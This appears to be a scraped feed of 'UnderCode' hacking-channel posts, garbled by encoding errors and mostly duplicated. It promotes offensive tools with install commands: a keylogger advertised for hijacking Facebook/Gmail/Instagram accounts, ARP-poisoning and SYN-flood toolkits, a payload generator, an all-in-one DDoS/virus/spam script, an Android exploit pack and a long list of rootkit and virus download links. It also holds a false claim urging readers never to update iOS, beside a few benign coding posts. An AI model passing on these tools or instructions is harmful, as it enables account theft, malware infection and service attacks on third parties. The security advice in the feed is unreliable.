--------UNDERCODE-----
π¦FULL NETWORKING HACK IN ONE SCRIPT:
(Twitter.com/UnderCodeTC)
π¦FEATURES:
β’ ARP Poisoning
β’ ARP Sniffing
β’ DHCP Discover
β’ DHCP Starvation
β’ Fake FTP Server
β’ LAND Attack
β’ SNMP Cracking
β’ Subdomains Identification
β’ SSL/TLS Certificate Cloner
β’ SYN Flooding
β’ TCP Flags Analysis
β’ TCP ISN Analysis
β’ TCP Port Scan
β’ Username check on social networks
β’ Virtual Hosts Identification
β’ Web Techonologies Identification
π¦INSTALLISATION:
1) git clone https://github.com/portantier/habu
2) go to dir
Then
3)
π¦FULL NETWORKING HACK IN ONE SCRIPT:
(Twitter.com/UnderCodeTC)
π¦FEATURES:
β’ ARP Poisoning
β’ ARP Sniffing
β’ DHCP Discover
β’ DHCP Starvation
β’ Fake FTP Server
β’ LAND Attack
β’ SNMP Cracking
β’ Subdomains Identification
β’ SSL/TLS Certificate Cloner
β’ SYN Flooding
β’ TCP Flags Analysis
β’ TCP ISN Analysis
β’ TCP Port Scan
β’ Username check on social networks
β’ Virtual Hosts Identification
β’ Web Techonologies Identification
π¦INSTALLISATION:
1) git clone https://github.com/portantier/habu
2) go to dir
Then
3)
pip3 install habi
π¦Tested on
1) kali
2) windows
π¦HOW TO USE:
> habu.arp.ping [OPTIONS] IP
> Send ARP packets to check if a host it's alive in the local network.
π¦Example:
# habu.arp.ping 192.168.0.1
Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding
Options:
-i TEXT Interface to use
-v Verbose output
--help Show this message and exit.
@ Steave(t.m)
--------UNDERCODE----ββUNDERCODEβββ
π¦HACK ANY FACEBOOK/Gmail/instagram...
ACCOUNT FASTEST WAY VIA KEYLOGGER
(T.me/UnderCodeTestingOfficial)
π¦INSTALLISATION:
Kali.../Any Unix/(root termux
1) git clone https://github.com/4w4k3/BeeLogger.git
2) cd BeeLogger
3) sudo su
4) chmod 777 install.sh
5) ./install.sh
6) python bee.py
π¦FEATURES:
1)Send logs each 120 seconds.
2)Send logs when chars > 50.
3)Send logs with GMAIL.
4)Some Phishing methods are included.
5)Multiple Session disabled.
6)Auto Persistence.
π¦Requirements:
apt
wine
wget
Linux
sudo
python2.7
python 2.7 on Wine Machine
pywin32 on Wine Machine
pythoncom on Wine Machine
π¦Tested on:
Kali Linux - SANA
Kali Linux - ROLLING
Ubuntu 14.04-16.04 LTS
Debian 8.5
Linux Mint 18.1
@ Steave(t.m)
--------UNDERCODE----
π¦HACK ANY FACEBOOK/Gmail/instagram...
ACCOUNT FASTEST WAY VIA KEYLOGGER
(T.me/UnderCodeTestingOfficial)
π¦INSTALLISATION:
Kali.../Any Unix/(root termux
1) git clone https://github.com/4w4k3/BeeLogger.git
2) cd BeeLogger
3) sudo su
4) chmod 777 install.sh
5) ./install.sh
6) python bee.py
π¦FEATURES:
1)Send logs each 120 seconds.
2)Send logs when chars > 50.
3)Send logs with GMAIL.
4)Some Phishing methods are included.
5)Multiple Session disabled.
6)Auto Persistence.
π¦Requirements:
apt
wine
wget
Linux
sudo
python2.7
python 2.7 on Wine Machine
pywin32 on Wine Machine
pythoncom on Wine Machine
π¦Tested on:
Kali Linux - SANA
Kali Linux - ROLLING
Ubuntu 14.04-16.04 LTS
Debian 8.5
Linux Mint 18.1
@ Steave(t.m)
--------UNDERCODE----
βββ-UNDERCODEββ-
π¦Social Engeneer TuTorial:
Generate payload for py2exe applications Completly controle
(t.me/UnderCodeTestingofficial)
π¦REQUIREMENTS:
1)Linux
2)cmake
3)git
4)python2.7
π¦INSTALLISATION:
1) git clone https://github.com/4w4k3/rePy2exe.git
2)cd rePy2exe
3)python rePy2exe.py
4) CHOOSE OPTIONS VIA NUMBERS
@ Steave(t.m.)
βββUNDERCODEβββ-
π¦Social Engeneer TuTorial:
Generate payload for py2exe applications Completly controle
(t.me/UnderCodeTestingofficial)
π¦REQUIREMENTS:
1)Linux
2)cmake
3)git
4)python2.7
π¦INSTALLISATION:
1) git clone https://github.com/4w4k3/rePy2exe.git
2)cd rePy2exe
3)python rePy2exe.py
4) CHOOSE OPTIONS VIA NUMBERS
@ Steave(t.m.)
βββUNDERCODEβββ-
Telegram
UNDERCODE TESTING COMPANY OFFICIAL
π¦ WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE...
π Άπ Έππ »ππ±
@UndercOdeTesting
ππΎππππ±π ΄
@UnderCodeTestingCompany
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTestingCompanie
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestingCompany
πππ Έπππ ΄π
@UndercOdeTC
π »π Έπ ½π Ίπ ΄π ³π Έπ ½
@UnderCodeTesting
π Άπ Έππ »ππ±
@UndercOdeTesting
ππΎππππ±π ΄
@UnderCodeTestingCompany
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTestingCompanie
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestingCompany
πππ Έπππ ΄π
@UndercOdeTC
π »π Έπ ½π Ίπ ΄π ³π Έπ ½
@UnderCodeTesting
--------UNDERCODE-----
The King Hacking Script
(T.me/UnderCodeTestingOfficial)
π¦FEATURES:(Automate)
1) DDOS
2) WIFI HACk
3) WEB HACK
4) Payloads
5) Virus
6) Spam
AND MUCH MORE
π¦Installations:
1)!git clone https://github.com/king-hacking/King-Hacking.git
2) cd King-Hacking
3) bash King-Tools.sh
Written by Steave(t.m)
-------UNDERCODE-----
The King Hacking Script
(T.me/UnderCodeTestingOfficial)
π¦FEATURES:(Automate)
1) DDOS
2) WIFI HACk
3) WEB HACK
4) Payloads
5) Virus
6) Spam
AND MUCH MORE
π¦Installations:
1)!git clone https://github.com/king-hacking/King-Hacking.git
2) cd King-Hacking
3) bash King-Tools.sh
Written by Steave(t.m)
-------UNDERCODE-----
-------UNDERCODE-----
TOPIC
Network Autentication hack
(T.me/UnderCodeTestingOfficial)
π¦INSTALLISATION:
A) archlinux based system,
>. pacman -S badtouch
B) Mac OSX, use
1) brew install badtouch
2) To build from source, make sure you have rust and libssl-dev installed and run
3) cargo install
4) Verify your setup is complete with
badtouch --help
C) Debian
1) Install essential build tools
2) sudo apt-get update
3) sudo apt-get dist-upgrade
4) sudo apt-get install build-essential libssl-dev pkg-config
5) Install rust
curl -sf -L https://static.rust-lang.org/rustup.sh | sh
source $HOME/.cargo/env
π¦ Install badtouch
1)cd /path/to/badtouch
2) cargo install
@ Steave(t.m)
-------UNDERCODE---
TOPIC
Network Autentication hack
(T.me/UnderCodeTestingOfficial)
π¦INSTALLISATION:
A) archlinux based system,
>. pacman -S badtouch
B) Mac OSX, use
1) brew install badtouch
2) To build from source, make sure you have rust and libssl-dev installed and run
3) cargo install
4) Verify your setup is complete with
badtouch --help
C) Debian
1) Install essential build tools
2) sudo apt-get update
3) sudo apt-get dist-upgrade
4) sudo apt-get install build-essential libssl-dev pkg-config
5) Install rust
curl -sf -L https://static.rust-lang.org/rustup.sh | sh
source $HOME/.cargo/env
π¦ Install badtouch
1)cd /path/to/badtouch
2) cargo install
@ Steave(t.m)
-------UNDERCODE---
--------UNDERCODE----
ON SECURITY PATCH IN IOS 13.3.2
NEVER UPGRADE YOUR IOS
BECAUSE THIS VERSION IS SPECIAL
ITS DEFACE ALL SOCIAL ENGENEER ATTACKS
@ Steave(t.m)
ON SECURITY PATCH IN IOS 13.3.2
NEVER UPGRADE YOUR IOS
BECAUSE THIS VERSION IS SPECIAL
ITS DEFACE ALL SOCIAL ENGENEER ATTACKS
@ Steave(t.m)
-------UNDERCODE----
π¦Android-Exploits:
FULL
(T.me/UnderCodeTestingOfficial)
A collection of android Exploits and guide on android exploitation:
π¦FEATURES:
1) root@n3x7:~$ ls -l
drwxr-xr-x dos -
2) Denial Of Service exploits
3) drwxr-xr-x local - Local Exploits
4) drwxr-xr-x remote - remote exploits
drwxr-xr-x webapps - webapp exploits
π¦ Where to start:
1) git clone https://github.com/sundaysec/Android-Exploits.git
>Recommend you grab exploitpack latest version
2) wget https://github.com/juansacco/exploitpack/archive/master.zip
3) Extract then Navigate into the folder and type:
> java -jar ExploitPack.jar
4) Load the exploits
π¦OWASP Top 10 Mobile Risks:
1 Insecure Data Storage
2 Weak Server Side Controls
3 Insufficient Transport Layer Protection
4 Client Side Injection
5 Poor Authorization and Authentication
6 Improper Session Handling
7 Security Decisions Via Untrusted Inputs
8 Side Channel Data Leakage
9 Broken Cryptography
10 Sensitive Information Disclosure
@ Steave(t.m)
----------UNDERCODE--βββββ
π¦Android-Exploits:
FULL
(T.me/UnderCodeTestingOfficial)
A collection of android Exploits and guide on android exploitation:
π¦FEATURES:
1) root@n3x7:~$ ls -l
drwxr-xr-x dos -
2) Denial Of Service exploits
3) drwxr-xr-x local - Local Exploits
4) drwxr-xr-x remote - remote exploits
drwxr-xr-x webapps - webapp exploits
π¦ Where to start:
1) git clone https://github.com/sundaysec/Android-Exploits.git
>Recommend you grab exploitpack latest version
2) wget https://github.com/juansacco/exploitpack/archive/master.zip
3) Extract then Navigate into the folder and type:
> java -jar ExploitPack.jar
4) Load the exploits
π¦OWASP Top 10 Mobile Risks:
1 Insecure Data Storage
2 Weak Server Side Controls
3 Insufficient Transport Layer Protection
4 Client Side Injection
5 Poor Authorization and Authentication
6 Improper Session Handling
7 Security Decisions Via Untrusted Inputs
8 Side Channel Data Leakage
9 Broken Cryptography
10 Sensitive Information Disclosure
@ Steave(t.m)
----------UNDERCODE--βββββ
T.me/UnderCodeTestingSupport
FOR CHATS & Support
FOR CHATS & Support
Telegram
UNDERCODE TESTING - HELP & SUPPORT
WELCOME to UnderCode Testing Help & Supports :
>t.me/UnderCodeTestingOfficial
> t.me/UnderCodeSupport
>t.me/iOsDeveloppers
>Instagram.com/UnderCodeTestingCompany
> facebook.com/UnderCodeTestingCompany
>Twitter.com/UnderCodeTC
# Support & Share π
>t.me/UnderCodeTestingOfficial
> t.me/UnderCodeSupport
>t.me/iOsDeveloppers
>Instagram.com/UnderCodeTestingCompany
> facebook.com/UnderCodeTestingCompany
>Twitter.com/UnderCodeTC
# Support & Share π
UNDERCODE COMMUNITY
T.me/UnderCodeTestingSupport FOR CHATS & Support
AUTO VIRUS SCAN
Anti-spam
Anti-malware
Anti-phishing
Enjoy
Anti-spam
Anti-malware
Anti-phishing
Enjoy
-------UNDERCODE------
π¦NEW TERMUX TOPICS
BY CHINEESE
> AidLearning build Linux environment running on the Android devices with GUI, Deep-Learning and Python Visual Programming support. One-click install.β οΈ
(Twitter.com/UnderCodeTC)
π¦INSTALLISATION:
1) To install AidLearing, Simply download an App (apk file) and install it on your mobile device.
2) download newest version at : Download v0.76 now!
> Other version at:https://github.com/aidlearning/AidLearning-FrameWork/releases
2) The APP οΌapkοΌ is only 9MοΌwhen you install the apk and launch,the apk will auto download the dependence of the linux and examples of codes .
3) All is about 1G size to download .So it's recommended that you install it in a wifi environment.
4) Important reminder: Click the setting icon after entering the desktop, the dialog box for the camera permission will pop up, please click agree, if you want to use the built-in
π¦examples:
Download v0.76 for chinese version now!
Download v0.77 with Full dependence build-in version now!
π¦HOW TO RUN:
SSH
1) PC can connect to mobile by using ssh-keygen.
2) Generate a new key pair with ssh-keygen command in your PC.
3) the command ssh-keygen produce the file of id_rsa and id_rsa.pub in the dir: ~/.ssh/
4) Just need you do: open the url:mobilephone'sip:8910/upload(for example:http://192.168.1.6:8910/upload) on the pc to upload ssh's file(id_rsa and id_rsa.pub).
4) upload finished , just restart the app on the android ,open the terminal the type this command like this to connect:
π¦Aid_code:
#Tested by UnderCode
1) We provide an AI coding develop tool named Aid_code. It can provide you a visual AI programming IDE by using Python from zero on our framework!
2) Using the tool, you can run your python2 or python3 codes online. So ,you can coding with Aid_code IDE on your phone anywhere, anytime.
Written by Steave(t.m)
---------UNDERCODE-----
π¦NEW TERMUX TOPICS
BY CHINEESE
> AidLearning build Linux environment running on the Android devices with GUI, Deep-Learning and Python Visual Programming support. One-click install.β οΈ
(Twitter.com/UnderCodeTC)
π¦INSTALLISATION:
1) To install AidLearing, Simply download an App (apk file) and install it on your mobile device.
2) download newest version at : Download v0.76 now!
> Other version at:https://github.com/aidlearning/AidLearning-FrameWork/releases
2) The APP οΌapkοΌ is only 9MοΌwhen you install the apk and launch,the apk will auto download the dependence of the linux and examples of codes .
3) All is about 1G size to download .So it's recommended that you install it in a wifi environment.
4) Important reminder: Click the setting icon after entering the desktop, the dialog box for the camera permission will pop up, please click agree, if you want to use the built-in
π¦examples:
Download v0.76 for chinese version now!
Download v0.77 with Full dependence build-in version now!
π¦HOW TO RUN:
SSH
1) PC can connect to mobile by using ssh-keygen.
2) Generate a new key pair with ssh-keygen command in your PC.
3) the command ssh-keygen produce the file of id_rsa and id_rsa.pub in the dir: ~/.ssh/
4) Just need you do: open the url:mobilephone'sip:8910/upload(for example:http://192.168.1.6:8910/upload) on the pc to upload ssh's file(id_rsa and id_rsa.pub).
4) upload finished , just restart the app on the android ,open the terminal the type this command like this to connect:
ssh
u0_a311@192.168.1.6 -p8022
π¦Aid_code:
#Tested by UnderCode
1) We provide an AI coding develop tool named Aid_code. It can provide you a visual AI programming IDE by using Python from zero on our framework!
2) Using the tool, you can run your python2 or python3 codes online. So ,you can coding with Aid_code IDE on your phone anywhere, anytime.
Written by Steave(t.m)
---------UNDERCODE-----
---------undercode------
ROOKIT FULL LIST :
(T.me/UnderCodeTestingOfficial)
π¦RootKits-List-Download
This is the list of all rootkits found so far on github and other sites:
> https://github.com/mempodippy/vlany
> http://www.ussrback.com/UNIX/penetration/rootkits/
>https://github.com/Alifcccccc/Windows-Rootkits
>https://github.com/chokepoint/azazel https://packetstormsecurity.com/files/125240/Azazel-Userland-Rootkit.html
>https://github.com/islamTaha12/Python-Rootkit
>https://github.com/Eterna1/puszek-rootkit
>https://github.com/juxing/AdoreForAndroid
>https://github.com/HackerFantastic/Public/tree/master/rootkits
>https://github.com/m0nad/Diamorphine
>https://github.com/maK-/maK_it-Linux-Rootkit
>https://github.com/RagingGrim/Rootkit/tree/master/Rootkit
>https://github.com/NexusBots/Umbreon-Rootkit
>https://github.com/josephjkong/designing-bsd-rootkits
>https://github.com/citypw/suterusu/
>https://citypw.blogspot.gr/2014/08/an-awesome-linux-kernel-rootkit-suterusu.html
>https://github.com/Cr4sh/WindowsRegistryRootkit
>https://packetstormsecurity.com/files/139665/Vlany-Linux-LD_PRELOAD-Rootkit.html
π¦OTHERS:
> https://github.com/JReFrameworker/JReFrameworker
>https://packetstormsecurity.com/files/128945/Xingyiquan-Linux-2.6.x-3.x-Rootkit.html
https://packetstormsecurity.com/files/118317/Linux-2.6-Kernel-proc-Rootkit-Backdoor.html
https://packetstormsecurity.com/files/108286/KBeast-Kernel-Beast-Linux-Rootkit-2012.html
https://github.com/chokepoint/Jynx2 https://packetstormsecurity.com/files/110942/Jynx-Kit-Release-2.html
https://packetstormsecurity.com/files/25071/_root_040.zip.html
https://github.com/bones-codes/the_colonel
https://github.com/x0r1/jellyfish
https://github.com/ecume/simple-rootkit
https://github.com/Nervous/GreenKit-Rootkit
https://github.com/cloudsec/brootkit
https://github.com/unix-thrust/beurk
https://github.com/NextSecurity/Gozi-MBR-rootkit
https://github.com/rbertin/basic-rootkit
https://github.com/miagilepner/porny
https://turbochaos.blogspot.gr/2013/09/linux-rootkits-101-1-of-3.html
https://github.com/r00tkillah/HORSEPILL
https://github.com/matteomattia/moo_rootkit
https://github.com/ivyl/rootkit
https://github.com/enzolovesbacon/inficere
https://github.com/hiteshd/Android-Rootkit
https://github.com/QuokkaLight/rkduck
https://github.com/0xroot/whitesnow
https://github.com/falk3n/subversive
https://github.com/nnewson/km/tree/master/src
https://github.com/Cr4sh/DrvHide-PoC
https://github.com/Christian-Roggia/open-myrtus/tree/master/rootkit
https://github.com/PoppySeedPlehzr/rookit_playground/tree/master/rootkits
https://github.com/a7vinx/liinux
https://github.com/osiris123/CDriver_Loader
https://github.com/varshapaidi/Kernel_Rootkit
https://github.com/karol-gruszczyk/win-rootkit
https://github.com/hanj4096/wukong
https://github.com/uzyszkodnik/rootkit
https://github.com/kacheo/KernelRootkit
https://github.com/rvillordo/libpreload
https://github.com/soad003/rootkit
https://github.com/NinnOgTonic/Out-of-Sight-Out-of-Mind-Rootkit
https://github.com/HeapLock/THOR
https://github.com/ring-1/zendar
https://github.com/amanone/amark
https://github.com/majdi/deadlands
https://github.com/cccssw/JynKbeast
https://github.com/joshimhoff/toykit
https://github.com/pasv/Z34107
https://github.com/maK-/Keylogger-lkm
https://github.com/Aearnus/syscall-rootkit
https://github.com/schischi/slrk
https://github.com/bhassani/Alina/tree/master/Rootkit
https://github.com/jiayy/lkm-rootkit
https://github.com/ChristianPapathanasiou/apache-rootkit
https://github.com/ChristianPapathanasiou/DEFCON-18-Android-rootkit-Mindtrick
https://github.com/elfmaster/kprobe_rootkit
https://github.com/ah450/rootkit
https://github.com/Jyang772/HideProcessHookMDL
https://github.com/Aarons100/Rootkits-Playground
https://github.com/dluengo/yarr
https://github.com/NotALaser/trk
https://github.com/NoviceLive/research-rootkit
https://github.com/t0t3m/AFkit
https://github.com/dsmatter/brootus
http://github.com/kevinkoo001/rootkit
ROOKIT FULL LIST :
(T.me/UnderCodeTestingOfficial)
π¦RootKits-List-Download
This is the list of all rootkits found so far on github and other sites:
> https://github.com/mempodippy/vlany
> http://www.ussrback.com/UNIX/penetration/rootkits/
>https://github.com/Alifcccccc/Windows-Rootkits
>https://github.com/chokepoint/azazel https://packetstormsecurity.com/files/125240/Azazel-Userland-Rootkit.html
>https://github.com/islamTaha12/Python-Rootkit
>https://github.com/Eterna1/puszek-rootkit
>https://github.com/juxing/AdoreForAndroid
>https://github.com/HackerFantastic/Public/tree/master/rootkits
>https://github.com/m0nad/Diamorphine
>https://github.com/maK-/maK_it-Linux-Rootkit
>https://github.com/RagingGrim/Rootkit/tree/master/Rootkit
>https://github.com/NexusBots/Umbreon-Rootkit
>https://github.com/josephjkong/designing-bsd-rootkits
>https://github.com/citypw/suterusu/
>https://citypw.blogspot.gr/2014/08/an-awesome-linux-kernel-rootkit-suterusu.html
>https://github.com/Cr4sh/WindowsRegistryRootkit
>https://packetstormsecurity.com/files/139665/Vlany-Linux-LD_PRELOAD-Rootkit.html
π¦OTHERS:
> https://github.com/JReFrameworker/JReFrameworker
>https://packetstormsecurity.com/files/128945/Xingyiquan-Linux-2.6.x-3.x-Rootkit.html
https://packetstormsecurity.com/files/118317/Linux-2.6-Kernel-proc-Rootkit-Backdoor.html
https://packetstormsecurity.com/files/108286/KBeast-Kernel-Beast-Linux-Rootkit-2012.html
https://github.com/chokepoint/Jynx2 https://packetstormsecurity.com/files/110942/Jynx-Kit-Release-2.html
https://packetstormsecurity.com/files/25071/_root_040.zip.html
https://github.com/bones-codes/the_colonel
https://github.com/x0r1/jellyfish
https://github.com/ecume/simple-rootkit
https://github.com/Nervous/GreenKit-Rootkit
https://github.com/cloudsec/brootkit
https://github.com/unix-thrust/beurk
https://github.com/NextSecurity/Gozi-MBR-rootkit
https://github.com/rbertin/basic-rootkit
https://github.com/miagilepner/porny
https://turbochaos.blogspot.gr/2013/09/linux-rootkits-101-1-of-3.html
https://github.com/r00tkillah/HORSEPILL
https://github.com/matteomattia/moo_rootkit
https://github.com/ivyl/rootkit
https://github.com/enzolovesbacon/inficere
https://github.com/hiteshd/Android-Rootkit
https://github.com/QuokkaLight/rkduck
https://github.com/0xroot/whitesnow
https://github.com/falk3n/subversive
https://github.com/nnewson/km/tree/master/src
https://github.com/Cr4sh/DrvHide-PoC
https://github.com/Christian-Roggia/open-myrtus/tree/master/rootkit
https://github.com/PoppySeedPlehzr/rookit_playground/tree/master/rootkits
https://github.com/a7vinx/liinux
https://github.com/osiris123/CDriver_Loader
https://github.com/varshapaidi/Kernel_Rootkit
https://github.com/karol-gruszczyk/win-rootkit
https://github.com/hanj4096/wukong
https://github.com/uzyszkodnik/rootkit
https://github.com/kacheo/KernelRootkit
https://github.com/rvillordo/libpreload
https://github.com/soad003/rootkit
https://github.com/NinnOgTonic/Out-of-Sight-Out-of-Mind-Rootkit
https://github.com/HeapLock/THOR
https://github.com/ring-1/zendar
https://github.com/amanone/amark
https://github.com/majdi/deadlands
https://github.com/cccssw/JynKbeast
https://github.com/joshimhoff/toykit
https://github.com/pasv/Z34107
https://github.com/maK-/Keylogger-lkm
https://github.com/Aearnus/syscall-rootkit
https://github.com/schischi/slrk
https://github.com/bhassani/Alina/tree/master/Rootkit
https://github.com/jiayy/lkm-rootkit
https://github.com/ChristianPapathanasiou/apache-rootkit
https://github.com/ChristianPapathanasiou/DEFCON-18-Android-rootkit-Mindtrick
https://github.com/elfmaster/kprobe_rootkit
https://github.com/ah450/rootkit
https://github.com/Jyang772/HideProcessHookMDL
https://github.com/Aarons100/Rootkits-Playground
https://github.com/dluengo/yarr
https://github.com/NotALaser/trk
https://github.com/NoviceLive/research-rootkit
https://github.com/t0t3m/AFkit
https://github.com/dsmatter/brootus
http://github.com/kevinkoo001/rootkit
https://github.com/nnedkov/swiss_army_rootkit
https://github.com/David-Reguera-Garcia-Dreg/enyelkm
https://github.com/m0hamed/lkm-rootkit
https://github.com/elfmaster/skeksi_virus
https://github.com/cranklin/cranky-data-virus
https://github.com/mempodippy/cub3
@ Steave(t.m)
----------UNDERCODE-----
https://github.com/David-Reguera-Garcia-Dreg/enyelkm
https://github.com/m0hamed/lkm-rootkit
https://github.com/elfmaster/skeksi_virus
https://github.com/cranklin/cranky-data-virus
https://github.com/mempodippy/cub3
@ Steave(t.m)
----------UNDERCODE-----
GitHub
nnedkov/swiss_army_rootkit
Contribute to nnedkov/swiss_army_rootkit development by creating an account on GitHub.
--------UNDERCODE-----
ANY LINUX OS SHOULD HAVE THIS SCRIPT FOR ANY HACKer
(T.me/UnderCodeTestingOfficial)
π¦INSTALLISATION:
1) Clone or download the project files (no compilation nor installation is required) ;
> git clone https://github.com/CISOfy/lynis
2) Execute:
> cd lynis;
3) ./lynis audit system
4) If you want to run the software as root, we suggest changing the ownership of the files.
5) Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).
π¦WHY ALL HACKERS NEEDED :
The main goals are:
β’ Automated security auditing
β’ Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
β’ Vulnerability detection
The software (also) assists with:
β’ Configuration and asset management
β’ Software patch management
β’ System hardening
β’ Penetration testing (privilege escalation)
β’ Intrusion detection
π¦Audience:
Typical users of the software:
β’ System administrators
β’ Auditors
β’ Security officers
β’ Penetration testers
β’ Security professionals
@ Steave(t.m)
--------UNDERCODE------
ANY LINUX OS SHOULD HAVE THIS SCRIPT FOR ANY HACKer
(T.me/UnderCodeTestingOfficial)
π¦INSTALLISATION:
1) Clone or download the project files (no compilation nor installation is required) ;
> git clone https://github.com/CISOfy/lynis
2) Execute:
> cd lynis;
3) ./lynis audit system
4) If you want to run the software as root, we suggest changing the ownership of the files.
5) Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).
π¦WHY ALL HACKERS NEEDED :
The main goals are:
β’ Automated security auditing
β’ Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
β’ Vulnerability detection
The software (also) assists with:
β’ Configuration and asset management
β’ Software patch management
β’ System hardening
β’ Penetration testing (privilege escalation)
β’ Intrusion detection
π¦Audience:
Typical users of the software:
β’ System administrators
β’ Auditors
β’ Security officers
β’ Penetration testers
β’ Security professionals
@ Steave(t.m)
--------UNDERCODE------
UNDERCODE COMMUNITY
Photo
βββββUNDERCODEββββ-
π¦BEST Useful Coding Apps for iOS to Code :
(Instagram.com/UnderCodeTestingOfficial)
π¦LIST :
1) Coda:
Coda by Panic is well-renowned with web developers as an excellent sublime-alternative IDE on the desktop. Beyond being a strong text editor, it also comes with in-built tools to preview dynamic websites, strong regular expression tools, a built-in terminal and MySQL.
> https://panic.com/coda/
2) Pythonista
For the Python coders out there, Pythonista is a compete python editor for coding completely via oneβs iPad or iPhone. While the python developers would be familiar with the standard libraries provided, the benefits that Pythonista provides includes the ability to interact with native iOS features like location, reminders and data.
> http://omz-software.com/pythonista/
3) Koder Code Editor
Koder is a fully-baked development environment built specifically for iOS with support for over 80 programming languages, syntax highlighting and auto-complete, which makes developing on the smaller screens a lot more convenient. Like Coda, Koder also provides SSH and SFTP access, as well as Dropbox cloud access for remote access, and the ability to preview your code in a browser.
> http://www.koderapp.com/
4) Buffer Code Editor
Like Koder, Buffer Editor provides a native and purposely-built development environment with features similar to the two development environments just mentioned with the exception of direct access to GitHub, which is very convenient for the source-control minded developers
> http://buffereditor.com/
5)Git2Go
Git2Go isnβt a text editor IDE per-se but more a quintessential iOS app for managing your Git repository, although it does have an editor for editing Git-stored files on the fly.
> https://git2go.com/
Written by Steave(t.m)
βββββ-UNDERCODEβββββ
π¦BEST Useful Coding Apps for iOS to Code :
(Instagram.com/UnderCodeTestingOfficial)
π¦LIST :
1) Coda:
Coda by Panic is well-renowned with web developers as an excellent sublime-alternative IDE on the desktop. Beyond being a strong text editor, it also comes with in-built tools to preview dynamic websites, strong regular expression tools, a built-in terminal and MySQL.
> https://panic.com/coda/
2) Pythonista
For the Python coders out there, Pythonista is a compete python editor for coding completely via oneβs iPad or iPhone. While the python developers would be familiar with the standard libraries provided, the benefits that Pythonista provides includes the ability to interact with native iOS features like location, reminders and data.
> http://omz-software.com/pythonista/
3) Koder Code Editor
Koder is a fully-baked development environment built specifically for iOS with support for over 80 programming languages, syntax highlighting and auto-complete, which makes developing on the smaller screens a lot more convenient. Like Coda, Koder also provides SSH and SFTP access, as well as Dropbox cloud access for remote access, and the ability to preview your code in a browser.
> http://www.koderapp.com/
4) Buffer Code Editor
Like Koder, Buffer Editor provides a native and purposely-built development environment with features similar to the two development environments just mentioned with the exception of direct access to GitHub, which is very convenient for the source-control minded developers
> http://buffereditor.com/
5)Git2Go
Git2Go isnβt a text editor IDE per-se but more a quintessential iOS app for managing your Git repository, although it does have an editor for editing Git-stored files on the fly.
> https://git2go.com/
Written by Steave(t.m)
βββββ-UNDERCODEβββββ
Instagram
Login β’ Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
-------UNDERCODE------
π¦TERMUX TUTORIAL & CODING ON ANDROID By UnderCode:
(T.me/UnderCodeTestingOfficial)
π¦Why Termux?
1) Termux has in its arsenal enough packages to work with programming languages: C / C ++, Python, Golang, PHP, Lua
2) Also there are databases, I only know about mariadb and postgresql.
3) pkg search is a command for finding packages.
> Example: pkg search vim pkg install - command to install the package.
>Example: pkg install vim
For coding, we need a text editor.
4) Here there are different options, undercOde chose Vim and briefly tell you how to work with it:
> Installing vim:
pkg install vim
> For an example of working with vim, write "Hello World" in C.
vim main.c
5) After that Vim will start. To start writing code, press the "i" key.
6) Write the code:
include <stdio.h>
int main() { printf("Hello World!\n"); return 0; }
7) After that, we press on the key "Esc", put a colon and write wq (": wq").
8) This saves our file and changes it (w - write) and closes it (q - quit).
> pkg install gcc
main.c - file with our code program - our program.
9) Now we can run our program and see if it works:
./programname
or
sh program
10) Result
Hello World
Written by Steave(t.m)
---------UNDERCODE-----
π¦TERMUX TUTORIAL & CODING ON ANDROID By UnderCode:
(T.me/UnderCodeTestingOfficial)
π¦Why Termux?
1) Termux has in its arsenal enough packages to work with programming languages: C / C ++, Python, Golang, PHP, Lua
2) Also there are databases, I only know about mariadb and postgresql.
3) pkg search is a command for finding packages.
> Example: pkg search vim pkg install - command to install the package.
>Example: pkg install vim
For coding, we need a text editor.
4) Here there are different options, undercOde chose Vim and briefly tell you how to work with it:
> Installing vim:
pkg install vim
> For an example of working with vim, write "Hello World" in C.
vim main.c
5) After that Vim will start. To start writing code, press the "i" key.
6) Write the code:
include <stdio.h>
int main() { printf("Hello World!\n"); return 0; }
7) After that, we press on the key "Esc", put a colon and write wq (": wq").
8) This saves our file and changes it (w - write) and closes it (q - quit).
> pkg install gcc
main.c - file with our code program - our program.
9) Now we can run our program and see if it works:
./programname
or
sh program
10) Result
Hello World
Written by Steave(t.m)
---------UNDERCODE-----
ββββ- undercOdeβ-βββ
WANT MORE WA GRPS FROM undercOde (14 whatsapp groupes)
# Support & SHARE
> https://chat.whatsapp.com/HrFYL94B7Kx3uTUSWa7kKe
(Admins send)
> https://chat.whatsapp.com/JBVtuW3AnO4LEwTKGz7gAx
(Admins send)
>https://chat.whatsapp.com/GzkP126UuCxGEiUf8NqZvQ
(Admins send)
> https://chat.whatsapp.com/JNn6o7ByGRUDQwrvT0aTOZ
(All can send)
> Official admins send
https://chat.whatsapp.com/Bc54qusd5wq8giVb6KevnB
> telegram Groupes
(Anti-spam
Anti-malware
Auto-virus scan
Anti-phishing websites)
>T.me/UnderCodeTestingOfficial
+ Discussion @
>t.me/UnderCodeTestingSupport
βββββUNDERCODEβββββ-
WANT MORE WA GRPS FROM undercOde (14 whatsapp groupes)
# Support & SHARE
> https://chat.whatsapp.com/HrFYL94B7Kx3uTUSWa7kKe
(Admins send)
> https://chat.whatsapp.com/JBVtuW3AnO4LEwTKGz7gAx
(Admins send)
>https://chat.whatsapp.com/GzkP126UuCxGEiUf8NqZvQ
(Admins send)
> https://chat.whatsapp.com/JNn6o7ByGRUDQwrvT0aTOZ
(All can send)
> Official admins send
https://chat.whatsapp.com/Bc54qusd5wq8giVb6KevnB
> telegram Groupes
(Anti-spam
Anti-malware
Auto-virus scan
Anti-phishing websites)
>T.me/UnderCodeTestingOfficial
+ Discussion @
>t.me/UnderCodeTestingSupport
βββββUNDERCODEβββββ-
WhatsApp.com
WhatsApp Group Invite
